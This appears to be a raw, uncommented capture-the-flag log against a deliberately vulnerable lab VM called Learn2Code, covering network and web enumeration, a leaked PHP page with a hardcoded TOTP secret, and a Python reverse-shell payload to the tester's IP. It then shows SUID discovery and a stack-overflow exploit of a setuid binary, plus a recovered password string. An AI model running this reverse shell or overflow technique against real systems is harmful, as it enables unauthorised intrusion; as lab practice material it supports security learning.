┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ff:66:80, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1    0a:00:27:00:00:11       (Unknown: locally administered)
192.168.31.2    08:00:27:80:63:b8       PCS Systemtechnik GmbH
192.168.31.178  08:00:27:7c:36:6c       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.436 seconds (105.09 hosts/sec). 3 responded

┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# rustscan -a 192.168.31.178 -r 1-65535
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Scanning ports faster than you can say 'SYN ACK'

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 65435'.
Open 192.168.31.178:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-08 01:29 EDT
Initiating ARP Ping Scan at 01:29
Scanning 192.168.31.178 [1 port]
Completed ARP Ping Scan at 01:29, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:29
Completed Parallel DNS resolution of 1 host. at 01:29, 0.05s elapsed
DNS resolution of 1 IPs took 0.05s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 01:29
Scanning 192.168.31.178 [1 port]
Discovered open port 80/tcp on 192.168.31.178
Completed SYN Stealth Scan at 01:29, 0.02s elapsed (1 total ports)
Nmap scan report for 192.168.31.178
Host is up, received arp-response (0.00031s latency).
Scanned at 2025-05-08 01:29:48 EDT for 0s

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:7C:36:6C (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds
           Raw packets sent: 2 (72B) | Rcvd: 2 (72B)

┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# gobuster dir -u "http://192.168.31.178/" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-m
edium.txt -x .txt,.php,.html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.31.178/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,txt,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/index.php            (Status: 200) [Size: 1161]
/includes             (Status: 301) [Size: 319] [--> http://192.168.31.178/includes/]
/todo.txt             (Status: 200) [Size: 51]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]

******* Remember to delete the bak files!! *******

<?php
	require_once 'GoogleAuthenticator.php';
	$ga = new PHPGangsta_GoogleAuthenticator();
	$secret = "S4I22IG3KHZIGQCJ";

	if ($_POST['action'] == 'check_code') {
		$code = $_POST['code'];
		$result = $ga->verifyCode($secret, $code, 1);

		if ($result) {
			include('coder.php');
		} else {
			echo "wrong";
		}
	}
?>

__import__('os').system('nc -e /bin/bash 192.168.31.129 4444')

www-data@Learn2Code:/var/www/html/includes/php$ find / -perm -u=s 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/chsh
/usr/bin/mount
/usr/bin/passwd
/usr/bin/su
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/MakeMeLearner
/usr/bin/chfn

int __fastcall main(int argc, const char **argv, const char **envp)
{
  char dest[76]; // [rsp+10h] [rbp-50h] BYREF
  int v5; // [rsp+5Ch] [rbp-4h]

  if ( argc == 1 )
    errx(1, "please specify an argument\n", envp);
  printf("Change the 'modified' variable value to '0x61626364' to be a learner");
  v5 = 0;
  strcpy(dest, argv[1]);
  if ( v5 == 1633837924 )
  {
    setuid(0x3E8u);
    setgid(0x3E8u);
    system("/bin/bash");
  }
  else
  {
    printf("Try again, you got 0x%08x\n", v5);
  }
  return 0;
}

Change the 'modified' variable value to '0x61626364' to be a learnerTry again, you got 0x00000061

Change the 'modified' variable value to '0x61626364' to be a learnerTry again, you got 0x00000061
<aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaadcba
learner@Learn2Code:/var/www/html/includes/php$

; Attributes: bp-based frame

; int __fastcall main(int argc, const char **argv, const char **envp)
public main
main proc near

var_18= qword ptr -18h
var_10= qword ptr -10h
var_8= qword ptr -8

; __unwind {
push    rbp
mov     rbp, rsp
sub     rsp, 20h
lea     rax, aNoi98ho   ; "NOI98hO"
mov     [rbp+var_8], rax
lea     rax, aIhj       ; "Ihj"
mov     [rbp+var_10], rax
lea     rax, aJj        ; ")(Jj"
mov     [rbp+var_18], rax
lea     rdi, s          ; "If you are a learner, i'm sure you know"...
call    _puts
mov     eax, 0
leave
retn
; } // starts at 1135
main endp

NOI98hOIhj)(Jj